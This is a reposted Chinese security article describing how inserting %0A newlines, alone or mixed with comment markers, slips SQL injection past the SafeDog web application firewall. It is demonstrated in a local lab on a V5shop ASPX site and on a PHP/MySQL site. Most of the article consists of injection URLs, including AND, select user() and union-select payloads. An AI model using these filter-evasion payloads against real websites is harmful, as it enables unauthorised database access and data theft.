当前位置:站长防黑网防黑文章站长空间安全事件

文章正文

安全狗SQL注射防护策略绕过漏洞

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2014-12-02 10:26:45

 安全狗绕过漏洞:用某字符直接绕过,某些特殊场合需要和注释符配合使用。


用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用

 

1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:

1
http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user


 

1.png



AND作为关键字被识别并拦截。



2、加入%0A再次尝试:
 

1
http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user


 

2.png





成功绕过并实现注入

另外:在Apache+php+Mysql环境中:

先按常规进行注入尝试:
 

1
http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”


 

wu (1).png



因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:
 

1
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

 

1
http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’


 

wu (4).png







当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:
 

1
http://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()


 

wu (3).png

 

温馨提示:您正在浏览的是来自站长防黑网收集的文章【安全狗SQL注射防护策略绕过漏洞

Tags:

站长推荐相关文章
  • 安全狗SQL注射防护策略绕过漏洞
  • 好的评价 如果您觉得此文章好,就请您
      0%(0)
    差的评价 如果您觉得此文章差,就请您
      0%(0)

    文章评论

    文章评论 评论内容只代表网友观点,与本站立场无关!
       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    网站首页 关于本站 网站帮助 广告合作 联系我们 免责申明 网站地图  ©2010- zzfhw.com . All rights reserved. 站长防黑网 版权所有